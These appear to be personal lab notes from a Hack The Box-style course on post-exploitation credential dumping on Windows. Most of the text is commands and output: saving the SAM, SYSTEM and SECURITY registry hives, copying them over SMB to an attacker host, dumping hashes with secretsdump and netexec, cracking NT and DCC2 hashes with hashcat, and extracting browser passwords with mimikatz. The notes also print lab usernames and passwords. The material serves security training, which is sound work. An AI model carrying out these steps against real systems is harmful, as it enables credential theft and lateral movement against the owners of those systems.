_Overview

With administrative access to a Windows system, one of the most effective post-exploitation techniques is to dump the Security Account Manager (SAM) database. The SAM stores hashed credentials for local user accounts and is a valuable target for attackers aiming to escalate privileges or move laterally within a network.

By extracting SAM, SYSTEM, and SECURITY hives from the target machine, we can transfer them to our attack host and perform offline hash cracking using tools such as Hashcat or John the Ripper, or even perform Pass-the-Hash attacks.

Windows Registery Hives

There are three registry hives we can copy if we have local administrative access to a target system, each serving a specific purpose when it comes to dumping and cracking password hashes. A brief description of each is provided in the table below:

hash differences

cheatsheet

reg.exe to save copies of the registry hives:

1
2
3
4
5
6

> reg.exe save hklm\sam C:\sam.save


> reg.exe save hklm\system C:\system.save

> reg.exe save hklm\security C:\security.save

copy to VM:

• create a smb share on attacking vm

1

$ impacket-smbserver -smb2support compdata /home/demise/mountshare

• move hives to share:

1
2
3
4
5
6
7
8

C:\> move sam.save \\10.10.15.16\compdata
      

 move security.save \\10.10.15.16\compdata
       

 move system.save \\10.10.15.16\compdata
     

1
2
3

$ ls

sam.save  security.save  system.save

dump LSA hashes remotely

1

$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

dump SAM hashes remotely

1

$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Dump Locally with impacket

1
2
3
4

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

dumping format:

1

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)

copy NT hash to a file using nano

crack NT hash with hashcat

1

$ hashcat -m 1000 c02478537b9727d391bc80011c2e2321 /usr/share/wordlists/rockyou.txt  -D 1 -O     

cracking DCC2 Hash (from Security hive)

hashed copies of network credential hashes. An example is:

1

inlanefreight.local/Administrator:$DCC2$10240#administrator#23d97555681813db79b2ade4b4a6ff25

The Hashcat mode for cracking DCC2 hashes is 2100.

1

$ hashcat -m 2100 '$DCC2$10240#administrator#23d97555681813db79b2ade4b4a6ff25' /usr/share/wordlists/rockyou.txt

DPAPI Decryption

DPAPI encrypted credentials can be decrypted manually with tools like Impacket’s dpapi, mimikatz, or remotely with DonPAPI.`

1
2
3
4
5
6
7
8
9
10
11

C:\Users\Public> mimikatz.exe
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
> AES Key is: efefdb353f36e6a9b7a7552cc421393daf867ac28d544e4f6f157e0a698e343c

URL     : http://10.10.14.94/ ( http://10.10.14.94/login.html )
Username: bob
 * using BCrypt with AES-256-GCM
Password: April2025!

This tells us how to interpret the output and which hashes we can attempt to crack.

Methodology

[] i dog
SAM + SYSTEM -> hash dump
SECURITY -> cached domain hashes
|
We can back up these hives using the reg.exe utility.

Using reg.exe to copy registry hives

By launching cmd.exe with administrative privileges, we can use reg.exe to save copies of the registry hives. Run the following commands:

1
2
3
4
5
6

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save


> reg.exe save hklm\system C:\system.save

> reg.exe save hklm\security C:\security.save

copying to vm

To create the share, we simply run smbserver.py -smb2support, specify a name for the share (e.g., CompData), and point to the local directory on our attack host where the hive copies will be stored (e.g., /home/ltnbob/Documents

DUMPING HASHES

the first step secretsdump performs is retrieving the system bootkey before proceeding to dump the local SAM hashes. This is necessary because the bootkey is used to encrypt and decrypt the SAM database. Without it, the hashes cannot be decrypted — which is why having copies of the relevant registry hives, as discussed earlier, is crucial.

1

Dumping local SAM hashes (uid:rid:lmhash:nthash)

DCC2 HASH

This type of hash is much more difficult to crack than an NT hash, as it uses PBKDF2. Additionally, it cannot be used for lateral movement with techniques like Pass-the-Hash (which we will cover later). The Hashcat mode for cracking DCC2 hashes is 2100.
DCC2 hashes is approximately 800 times slower to crack

DPAPI

DPAPI encrypted credentials can be decrypted manually with tools like Impacket’s dpapi, mimikatz, or remotely with DonPAPI.

1
2
3
4
5
6
7
8
9
10
11

C:\Users\Public> mimikatz.exe
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * using CryptUnprotectData API
> AES Key is: efefdb353f36e6a9b7a7552cc421393daf867ac28d544e4f6f157e0a698e343c

URL     : http://10.10.14.94/ ( http://10.10.14.94/login.html )
Username: bob
 * using BCrypt with AES-256-GCM
Password: April2025!

Remote dumping & LSA secrets considerations

With access to credentials that have local administrator privileges, it is also possible to target LSA secrets over the network. This may allow us to extract credentials from running services, scheduled tasks, or applications that store passwords using LSA secrets.

1
2
3
4

magdy3660@htb[/htb]$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
[+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a<SNIP>